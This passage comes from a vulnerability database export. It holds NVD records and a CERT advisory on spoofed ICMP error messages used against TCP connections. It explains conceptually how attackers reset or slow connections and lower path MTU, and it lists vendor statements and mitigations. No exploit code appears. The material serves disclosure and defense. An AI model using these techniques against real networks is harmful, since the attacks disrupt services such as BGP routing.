"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_98:*", "cpe:/o:sun:solaris:10.0", "cpe:/o:sun:sunos:5.7", "cpe:/o:microsoft:windows_me:*", "cpe:/o:sun:sunos:5.8", "cpe:/o:microsoft:windows_98se:*", "cpe:/o:sun:solaris:9.0", "cpe:/o:microsoft:windows_2003_server:r2"], "id": "CVE-2004-0790", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0790", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:fr:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*", "cpe:2.3:o:sun:solaris:10.0:*:sparc:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:45:53", "description": "Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (network throughput reduction for TCP connections) via a blind throughput-reduction attack using spoofed Source Quench packets, aka the \"ICMP Source Quench attack.\" NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2005-04-12T04:00:00", "type": "cve", "title": "CVE-2004-0791", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:sun:sunos:5.8", "cpe:/o:sun:solaris:9.0", "cpe:/o:sun:solaris:10.0", "cpe:/o:sun:sunos:5.7"], "id": "CVE-2004-0791", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0791", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:10.0:*:sparc:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:10", "description": "The original design of TCP does not check that the TCP sequence number in an ICMP error message is within the range of sequence numbers for data that has been sent but not acknowledged (aka \"TCP sequence number checking\"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2005-05-02T04:00:00", "type": "cve", "title": "CVE-2005-0065", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0065", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:12", "description": "The original design of TCP does not require that port numbers be assigned randomly (aka \"Port randomization\"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-12-22T05:00:00", "type": "cve", "title": "CVE-2005-0067", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0067", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0067", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:12", "description": "The original design of TCP does not check that the TCP Acknowledgement number in an ICMP error message generated by an intermediate router is within the range of possible values for data that has already been acknowledged (aka \"TCP acknowledgement number checking\"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-12-22T05:00:00", "type": "cve", "title": "CVE-2005-0066", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0066", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:14", "description": "The original design of ICMP does not require authentication for host-generated ICMP error messages, which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-12-22T05:00:00", "type": "cve", "title": "CVE-2005-0068", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0068", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}], "cert": [{"lastseen": "2021-09-28T17:52:39", "description": "### Overview\n\nMultiple TCP/IP implementations do not adequately validate ICMP error messages. A remote attacker could cause TCP connections to drop or be degraded using spoofed ICMP error messages.\n\n### Description\n\nA number of widely accepted Internet standards describe different aspects of the relationships between the Internet Control Message Protocol (ICMP) and Transmission Control Protocol (TCP). In particular, [RFC 1122](<http://www.ietf.org/rfc/rfc1122.txt>) explains how TCP should respond to ICMP messages:\n\n`\n\n\n`4.2.3.9 ICMP Messages TCP MUST act on an ICMP error message passed up from the IP layer, directing it to the connection that created the error. The necessary demultiplexing information can be found in the IP header contained within the ICMP message. o Source Quench TCP MUST react to a Source Quench by slowing transmission on the connection. The RECOMMENDED procedure is for a Source Quench to trigger a \"slow start,\" as if a retransmission timeout had occurred. o Destination Unreachable -- codes 0, 1, 5 Since these Unreachable messages indicate soft error conditions, TCP MUST NOT abort the connection, and it SHOULD make the information available to the application. DISCUSSION: TCP could report the soft error condition directly to the application layer with an upcall to the ERROR_REPORT routine, or it could merely note the message and report it to the application only when and if the TCP connection times out. o Destination Unreachable -- codes 2-4 These are hard error conditions, so TCP SHOULD abort the connection. o Time Exceeded -- codes 0, 1 This should be handled the same way as Destination Unreachable codes 0, 1, 5 (see above). o Parameter Problem This should be handled the same way as Destination Unreachable codes 0, 1, 5 (see above). \nAn ICMP message contains the IP header and the first 8 bytes of the transport layer (TCP) segment that caused the error condition (this covers IP and TCP header information). In order to match an ICMP message to a TCP connection, TCP stack implementations generally match the source and destination TCP port and IP address four-tuple from the data returned in the ICMP message. An attacker who knows or can guess this four-tuple can create spoofed ICMP messages. By setting ICMP types and codes to indicate hard or soft error conditions, the attacker may be able to cause valid TCP connections to be reset or degraded. An attacker may also be able to take advantage of path MTU discovery functionality by spoofing ICMP type 3 (Destination Unreachable) code 4 (Fragmentation Needed but Don't Fragment Bit Set) messages and lowering the MTU for a connection (this is described in section 8 of RFC 1191). \n \nNote that any protocols that use path MTU discovery and state-based transport layer protocols other than TCP could also be affected. \n \nFurther details about this vulnerability are available in an IETF Internet Draft titled \"ICMP attacks against TCP\" authored by [Fernando Gont](<http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html>). \n \n--- \n \n### Impact\n\nA remote attacker could cause TCP connections to drop or be degraded using spoofed ICMP error messages. Applications that depend on on long-lived, low latency, or high throughput TCP connections may not function correctly on a degraded TCP connection. In order to spoof an ICMP message, an attacker would need to know or guess the source and destination TCP port and IP address four-tuple. The Border Gateway Protocol (BGP) is of paticular concern since it relies on long-lived TCP connections ([VU#415294](<http://www.kb.cert.org/vuls/id/415294>)), uses well-known source and destination ports, provides critical network and Internet routing information, and may require a non-trivial period of time to recover from a sustained attack. \n \n--- \n \n### Solution\n\n**Upgrade or apply a patch** \nUpgrade or apply a patch according to vendor instructions. Note that changes made by upgrades or patches may not completely defend against spoofed ICMP attacks. Consult vendor documentation for information on changes to ICMP message handling. Consider the general and attack-specific countermeasures discussed in the Gont I-D. Some of the countermesures include validating TCP sequence and acknowledgement numbers contained in ICMP messages, improving TCP ephemeral port number randomization, changing the response to or ignoring certain ICMP messages, and delaying connection resets. Note that different countermeasures have different constraints and may negatively impact TCP operations. \n \n**Filter ICMP messages** \n \nFilter ICMP messages based on type and code at network borders. Allow only ICMP messages that are necessary for proper operation. \n \n**IPsec and TCP MD5** \n \nNote that TCP MD5 does not provide authentication for ICMP messages. Current IPsec specifications do not define how IPsec implementations should handle ICMP messages destined for authenticated TCP connections. \n \n--- \n \n### Vendor Information\n\n222750\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Alcatel __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Allied Telesyn International __ Affected\n\nUpdated: April 29, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFor customers in Japan, Allied Telesis K.K. which is a member of AT-Group has published a statement only for Japanese market. Please visit the following web sites. \n\n\n \n<http://jvn.jp/niscc/532967/522154/index.html> (Japanese) \n<http://www.allied-telesis.co.jp/support/list/faq/vuls/vulsall.html> (Japanese) \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Cisco Systems, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Extreme Networks __ Affected\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nExtreme Networks products running \"Extremeware 7.x\" software are vulnerable to this issue. Extreme Networks products running \"Extremeware EXOS\" software are not vulnerable.\n\nWorkaround: Apply filter to block ICMP packets with specific type/code which can cause the attack. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### F5 Networks, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: May 03, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nF5 products BIG-IP 4.x and 9.x are vulnerable. Patches are being made ready. TrafficShield and FirePass are not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFurther information is available in Secunia Advisory [SA15205](<http://secunia.com/advisories/15205/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSOURCE: Hewlett-Packard CompanySoftware Security Response Team\n\nx-ref:SSRT4884 \n \nHP is investigating the potential impact to HP's products. \n \nAs further information becomes available HP will provide notice through standard security bulletin announcements. \n \nTo report potential security vulnerabilities in HP software, send an E-mail message to [security-alert@hp.com](<mailto:security-alert@hp.com>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see HPSBUX01164/SSRT4884 (HP-UX) and HPSBTU01210/SSRT4743 (HP Tru64 UNIX).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Hitachi __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n[[VULNERABLE]&lt;br&gt;\n\nHitachi GR2000/GR4000/GS4000/GS3000 are vulnerable to this issue. More details are available at &lt;<http://www.hitachi.co.jp/Prod/comp/network/notice/NISCC-532967.html>&gt; (Japanese).] \n \n[NOT VULNERABLE] \nAlaxala AX series are NOT vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en> and <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### IBM Corporation __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX Operating System is affected by the issues discussed in CERT Vulnerability note VU#222750 and NISCC vulnerability #432967. An advisory for this issue will be available via <https://techsupport.services.ibm.com/server/pseries.subscriptionSvcs>\n\nFor information related to this and other published CERT Advisories that may relate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) please go to [https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&amp;pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To subscribe to Resource Link go to <http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for registration. \n \nAll questions should be refferred to servsec@us.ibm.com.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Juniper Networks, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: May 05, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJuniper Networks M-series and T-series routers running software built prior to August 18, 2004, are susceptible to this vulnerability. Software built on or after that date disables processing of ICMP Source Quench messages, permits the user to disable Path MTU Discovery, and has additional verification enabled for PMTUD. The various forms of ICMP Unreachable messages are already ignored except during session establishment.\n\nOther Juniper Networks products are not susceptible to this vulnerability. Customers should visit the Juniper Networks Customer Service Center web-site for further information: \n\n\n<http://www.juniper.net/customers/csc>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en> and <https://www.juniper.net/customers/csc>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: August 12, 2004 Updated: April 29, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Microsoft Security Bulletin [MS05-019](<http://www.microsoft.com/technet/security/bulletin/MS05-019.mspx>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Netfilter __ Affected\n\nNotified: August 12, 2004 Updated: April 29, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Linux kernel TCP/IP implementation has always been verifying the TCP sequence number embedded into the ICMP packet, and Linux end hosts are thus not affected by this vulnerability.\n\nAs for non-Linux machines protected by a netfilter/iptables firewall: netfilter/iptables did not implement TCP sequence number (aka window) tracking at all until linux-2.6.9. \n \nHowever, even in linux &gt;= 2.6.9, the check for RELATED ICMP packets does not verify the tcp sequence number of the encapsulated packet. \n \nImplementation of such a check is scheduled for inclusion into the 2.6.11 linux kernel.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Network Appliance __ Affected\n\nNotified: August 12, 2004 Updated: April 11, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Data ONTAP operating system has historically implemented some, but not all, of the recommendations from <http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-03.txt>\n\nNetApp has implemented the remaining recommendations under bug ID 138865. Customers may, as always, check bug status and download patches from <http://now.netapp.com/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Nortel Networks, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Nortel Technical Bulletins [2005005697](<http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?level=6&category=8&subcategory=7&subtype=&DocumentOID=326515&RenditionID=REND304870>), [2005005700](<http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?level=6&category=8&subcategory=7&subtype=&DocumentOID=320082&RenditionID=REND323461>), and [2005005701](<http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?level=6&category=8&subcategory=7&subtype=&DocumentOID=320119&RenditionID=REND266149>) on the Nortel [Securitiy Advisory Bulletins](<http://www.nortel.com/securityadvisories>) site.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### OpenBSD __ Affected\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [027: RELIABILITY FIX: August 25, 2004](<http://www.openbsd.org/errata34.html#icmp>) for OpenBSD 3.4 and [015: RELIABILITY FIX: August 25, 2004](<http://www.openbsd.org/errata35.html#icmp>) for OpenBSD 3.5.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCAN-2004-0790: A blind TCP connection reset\n\nRed Hat Enterprise Linux 2.1 and 3 kernels have always verified the TCP sequence number on ICMP errors. In addition Linux kernels will never abort a connection due to a received ICMP packet. All Red Hat Enterprise Linux versions are therefore unaffected by this issue. \n \nCAN-2004-0791: A spoofing attack with ICMP type 4 header \n \nRed Hat Enterprise Linux 2.1 and 3 kernels prior to January 2005 honour ICMP Source Quench messages, although the TCP sequence number is checked which substantially increases the amount of effort an attacker would need to be able to cause a sucessful attack. ICMP Source Quench messages were disabled completely by the following updates: \n\n\n<http://rhn.redhat.com/errata/RHSA-2005-043.html> \n<http://rhn.redhat.com/errata/RHSA-2005-016.html> \n<http://rhn.redhat.com/errata/RHSA-2005-017.html> \nCAN-2004-1060: ICMP path MTU spoofing \n \nRed Hat Enterprise Linux 2.1 and 3 kernels verify the sequence number on ICMP errors, thus significantly mitigating this issue. This issue can also be mitigated by disabling pmtu discovery if not required (/proc/sys/net/ipv4/ip_no_pmtu_disc) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Redback Networks Inc. __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nLike most of TCP implementations, both product lines of Redback Networks, Subscriber Management System and SmartEdge Router Family are affected by this vulnerability.\n\nThe fixes will be available on both platforms in upcoming releases. \n \nFor further assistance regarding this topic contact the Redback Networks Technical Assistance Center (TAC). TAC is prepared to provide worldwide support for security workarounds that address this issue. The Redback domestic TAC number is (877) 733 2225 and International TAC phone number is 31-104987777. Redback TAC will provide detailed information to our worldwide systems engineers and focal engineers to assist customers in configuring these workarounds.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SCO __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSCO is aware of the issue and is working on a fix.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFor UnixWare 7.1.4 the fix is included in maintenance pack 2:\n\n \n<http://www.sco.com/support/update/download/release.php?rid=58>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Sun Microsystems, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSun is only marginally impacted by the issues described in Gont's ICMP Internet Draft as existing TCP connections will not be dropped. There may be a performance impact but no more or less than flooding any link or system with garbage messages will cause performance problems. Sun is issuing Sun Alert 57746 to further describe Sun's specific impact and details which will be available here:\n\n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57746-1>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about 